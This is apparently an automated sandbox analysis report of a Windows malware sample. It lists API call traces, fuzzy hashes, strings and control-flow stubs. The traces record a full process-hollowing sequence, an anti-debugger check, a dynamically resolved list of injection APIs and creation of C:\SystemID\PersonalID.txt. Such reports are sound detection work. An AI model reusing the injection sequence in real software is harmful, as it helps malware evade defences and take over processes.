                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                • TranslateMessage.USER32(?), ref: 0041B4CD
                • DispatchMessageW.USER32(?), ref: 0041B4D7
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                • String ID: %username%$I:\5d2860c89d774.jpg
                • API String ID: 441990211-897913220
                • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .\crypto\err\err.c$unknown
                • API String ID: 0-565200744
                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                APIs
                • _memset.LIBCMT ref: 0042419D
                • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: DebuggerPresent_memset
                • String ID: i;B
                • API String ID: 2328436684-472376889
                • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8Q
                • API String ID: 3761405300-2096853525
                • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                • _memset.LIBCMT ref: 00413C83
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                • String ID: vector<T> too long
                • API String ID: 1327501947-3788999226
                • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _fputws$CreateDirectory
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2590308727-54166481
                • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                APIs
                Strings
                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt
                • String ID: Assertion failed: %s, file %s, line %d
                • API String ID: 3494438863-969893948
                • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                APIs
                • _memset.LIBCMT ref: 00480686
                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                Strings
                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                • .\crypto\evp\digest.c, xrefs: 00480638
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset_raise
                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                • API String ID: 1484197835-3867593797
                • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                APIs
                • std::exception::exception.LIBCMT ref: 0044F251
                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                • __CxxThrowException@8.LIBCMT ref: 0044F266
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                • String ID: TeM
                • API String ID: 757275642-2215902641
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

                Execution Graph

                Execution Coverage:1.3%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:41
                Total number of Limit Nodes:8
                execution_graph 32022 a6d026 32023 a6d035 32022->32023 32026 a6d7c6 32023->32026 32029 a6d7e1 32026->32029 32027 a6d7ea CreateToolhelp32Snapshot 32028 a6d806 Module32First 32027->32028 32027->32029 32030 a6d815 32028->32030 32031 a6d03e 32028->32031 32029->32027 32029->32028 32033 a6d485 32030->32033 32034 a6d4b0 32033->32034 32035 a6d4c1 VirtualAlloc 32034->32035 32036 a6d4f9 32034->32036 32035->32036 32036->32036 32037 cb0000 32040 cb0630 32037->32040 32039 cb0005 32045 cb0010 32040->32045 32042 cb064c LoadLibraryA 32043 cb0702 32042->32043 32047 cb1577 32043->32047 32046 cb0028 32045->32046 32046->32042 32050 cb05b0 32047->32050 32053 cb05dc 32050->32053 32051 cb061e 32052 cb05e2 GetFileAttributesA 32052->32053 32053->32051 32053->32052 32055 cb0420 32053->32055 32056 cb04f3 32055->32056 32057 cb04fa 32056->32057 32058 cb04ff CreateWindowExA 32056->32058 32057->32053 32058->32057 32059 cb0540 PostMessageA 32058->32059 32060 cb055f 32059->32060 32060->32057 32062 cb0110 VirtualAlloc GetModuleFileNameA 32060->32062 32063 cb017d CreateProcessA 32062->32063 32064 cb0414 32062->32064 32063->32064 32066 cb025f VirtualFree VirtualAlloc Wow64GetThreadContext 32063->32066 32064->32060 32066->32064 32067 cb02a9 ReadProcessMemory 32066->32067 32068 cb02e5 VirtualAllocEx NtWriteVirtualMemory 32067->32068 32069 cb02d5 NtUnmapViewOfSection 32067->32069 32072 cb033b 32068->32072 32069->32068 32070 cb039d WriteProcessMemory Wow64SetThreadContext ResumeThread 32073 cb03fb ExitProcess 32070->32073 32071 cb0350 NtWriteVirtualMemory 32071->32072 32072->32070 32072->32071

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00CB0156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 00CB016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 00CB0255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00CB0270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00CB0283
                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 00CB029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00CB02C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 00CB02E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00CB0304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 00CB032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00CB0399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00CB03BF
                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 00CB03E1
                • ResumeThread.KERNELBASE(00000000), ref: 00CB03ED
                • ExitProcess.KERNEL32(00000000), ref: 00CB0412
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 93872480-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: 9ec58de27422824e7690ad4c03508a6c86fdd4452654f66fe52a7e6bf47404cd
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: A5B1B674A00208AFDB44CF98C895F9EBBB5BF88314F248158E509AB395D771AE45CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 cb0630-cb1572 call cb0010 LoadLibraryA call cb1577
                APIs
                • LoadLibraryA.KERNELBASE(user32), ref: 00CB06E2
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
                • API String ID: 1029625771-3105132389
                • Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                • Instruction ID: bde89067b1c02546069022ae41fcc7f9281ae8e6bc2a1b407e2b163f479bd761
                • Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                • Instruction Fuzzy Hash: 0BA24460D0C6E8C9EB21C668CC4C7DDBEB51B26749F0841D9858C66292C7BB1B98CF76

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 50 cb0420-cb04f8 52 cb04fa 50->52 53 cb04ff-cb053c CreateWindowExA 50->53 54 cb05aa-cb05ad 52->54 55 cb053e 53->55 56 cb0540-cb0558 PostMessageA 53->56 55->54 57 cb055f-cb0563 56->57 57->54 58 cb0565-cb0579 57->58 58->54 60 cb057b-cb0582 58->60 61 cb05a8 60->61 62 cb0584-cb0588 60->62 61->57 62->61 63 cb058a-cb0591 62->63 63->61 64 cb0593-cb0597 call cb0110 63->64 66 cb059c-cb05a5 64->66 66->61
                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00CB0533
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: ea2005b5bd1437b538f1ea4465b978ca97c9940e8f4a31ffec9ecd2081c9a9f7
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: BE512B70D08388DEEB11CBD8C849BDEBFB66F11708F244058D5447F286C3BA5A58CB66

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 67 cb05b0-cb05d5 68 cb05dc-cb05e0 67->68 69 cb061e-cb0621 68->69 70 cb05e2-cb05f5 GetFileAttributesA 68->70 71 cb0613-cb061c 70->71 72 cb05f7-cb05fe 70->72 71->68 72->71 73 cb0600-cb060b call cb0420 72->73 75 cb0610 73->75 75->71
                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 00CB05EC
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: b1a622391d86662e32f0b2bea328bc91b7a85885dd8b51aa088a5fd354824a0d
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: D5011E70C0424CEADB10DB98C5187EEBFB5AF41308F248099D8192B242D7769B58CBA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 76 a6d7c6-a6d7df 77 a6d7e1-a6d7e3 76->77 78 a6d7e5 77->78 79 a6d7ea-a6d7f6 CreateToolhelp32Snapshot 77->79 78->79 80 a6d806-a6d813 Module32First 79->80 81 a6d7f8-a6d7fe 79->81 82 a6d815-a6d816 call a6d485 80->82 83 a6d81c-a6d824 80->83 81->80 87 a6d800-a6d804 81->87 88 a6d81b 82->88 87->77 87->80 88->83
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A6D7EE
                • Module32First.KERNEL32(00000000,00000224), ref: 00A6D80E
                Memory Dump Source
                • Source File: 00000004.00000002.2081980325.0000000000A6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_a6d000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: 2dab347e0b717979f0ad2ad6a055941fe21e64a66db35dbd8f87b514c1789958
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: 94F09631B007116FD7203BF5AC8DB6E76F8AF497A5F100528E653920C0DB70EC458661

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 89 a6d485-a6d4bf call a6d798 92 a6d4c1-a6d4f4 VirtualAlloc call a6d512 89->92 93 a6d50d 89->93 95 a6d4f9-a6d50b 92->95 93->93 95->93
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A6D4D6
                Memory Dump Source
                • Source File: 00000004.00000002.2081980325.0000000000A6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_a6d000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: 04e3696e69f7a8ea8ed169f7a9367b7ddabb46c98c5e568bca63be8ac78f53ee
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 5F113C79A00208EFDB01DF98CA85E99BBF5AF08350F058094F9499B362D371EA90DF80

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 550 cd6437-cd6440 551 cd6466 550->551 552 cd6442-cd6446 550->552 553 cd6468-cd646b 551->553 552->551 554 cd6448-cd6459 call cd9636 552->554 557 cd646c-cd647d call cd9636 554->557 558 cd645b-cd6460 call cd5ba8 554->558 563 cd647f-cd6480 call cd158d 557->563 564 cd6488-cd649a call cd9636 557->564 558->551 567 cd6485-cd6486 563->567 569 cd64ac-cd64cd call cd5f4c call cd6837 564->569 570 cd649c-cd64aa call cd158d * 2 564->570 567->558 579 cd64cf-cd64dd call cd557d 569->579 580 cd64e2-cd6500 call cd158d call cd4edc call cd4d82 call cd158d 569->580 570->567 585 cd64df 579->585 586 cd6502-cd6505 579->586 588 cd6507-cd6509 580->588 585->580 586->588 588->553
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                • String ID:
                • API String ID: 1442030790-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: bfb1e8d6225f106fd61f2b604494a66adeec0e9f9e3f237a86531ba6b824d8ab
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: EB21A135104601EEE721BF65EC02D4BBBD4DF81760B64812BF795553A2FB32CA50EB50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 594 cd3f16-cd3f2f 595 cd3f49-cd3f5e call cdbdc0 594->595 596 cd3f31-cd3f3b call cd5ba8 call cd4c72 594->596 595->596 602 cd3f60-cd3f63 595->602 603 cd3f40 596->603 604 cd3f65 602->604 605 cd3f77-cd3f7d 602->605 608 cd3f42-cd3f48 603->608 609 cd3f6b-cd3f75 call cd5ba8 604->609 610 cd3f67-cd3f69 604->610 606 cd3f7f 605->606 607 cd3f89-cd3f9a call ce0504 call ce01a3 605->607 606->609 612 cd3f81-cd3f87 606->612 618 cd4185-cd418f call cd4c9d 607->618 619 cd3fa0-cd3fac call ce01cd 607->619 609->603 610->605 610->609 612->607 612->609 619->618 624 cd3fb2-cd3fbe call ce01f7 619->624 624->618 627 cd3fc4-cd3fcb 624->627 628 cd3fcd 627->628 629 cd403b-cd4046 call ce02d9 627->629 631 cd3fcf-cd3fd5 628->631 632 cd3fd7-cd3ff3 call ce02d9 628->632 629->608 635 cd404c-cd404f 629->635 631->629 631->632 632->608 639 cd3ff9-cd3ffc 632->639 637 cd407e-cd408b 635->637 638 cd4051-cd405a call ce0554 635->638 641 cd408d-cd409c call ce0f40 637->641 638->637 647 cd405c-cd407c 638->647 642 cd413e-cd4140 639->642 643 cd4002-cd400b call ce0554 639->643 650 cd409e-cd40a6 641->650 651 cd40a9-cd40d0 call ce0e90 call ce0f40 641->651 642->608 643->642 652 cd4011-cd4029 call ce02d9 643->652 647->641 650->651 660 cd40de-cd4105 call ce0e90 call ce0f40 651->660 661 cd40d2-cd40db 651->661 652->608 657 cd402f-cd4036 652->657 657->642 666 cd4107-cd4110 660->666 667 cd4113-cd4122 call ce0e90 660->667 661->660 666->667 670 cd414f-cd4168 667->670 671 cd4124 667->671 672 cd413b 670->672 673 cd416a-cd4183 670->673 674 cd412a-cd4138 671->674 675 cd4126-cd4128 671->675 672->642 673->642 674->672 675->674 676 cd4145-cd4147 675->676 676->642 677 cd4149 676->677 677->670 678 cd414b-cd414d 677->678 678->642 678->670
                APIs
                • _memset.LIBCMT ref: 00CD3F51
                  • Part of subcall function 00CD5BA8: __getptd_noexit.LIBCMT ref: 00CD5BA8
                • __gmtime64_s.LIBCMT ref: 00CD3FEA
                • __gmtime64_s.LIBCMT ref: 00CD4020
                • __gmtime64_s.LIBCMT ref: 00CD403D
                • __allrem.LIBCMT ref: 00CD4093
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CD40AF
                • __allrem.LIBCMT ref: 00CD40C6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CD40E4
                • __allrem.LIBCMT ref: 00CD40FB
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CD4119
                • __invoke_watson.LIBCMT ref: 00CD418A
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                • String ID:
                • API String ID: 384356119-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: 14c1b856fbd3e7b5b72ea82c3d52f1b3112c83389af0a6591d5651ccd896cd99
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: DF71C671A00B16ABD718AFA9CC41B6AB3B9AF10364F14416BF724D7781E7B0DE8097D1

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                • String ID:
                • API String ID: 3432600739-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: 1757c29b50a164c972e29ec635a2f8bc525e87dec2fe3edbc62091b23b9941a8
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: C641D132904304AFDB00AFA4D982B9E7BE5EF44314F10842FFB1496392DB759A46EB55

                Control-flow Graph

                • Executed
                • Not Executed
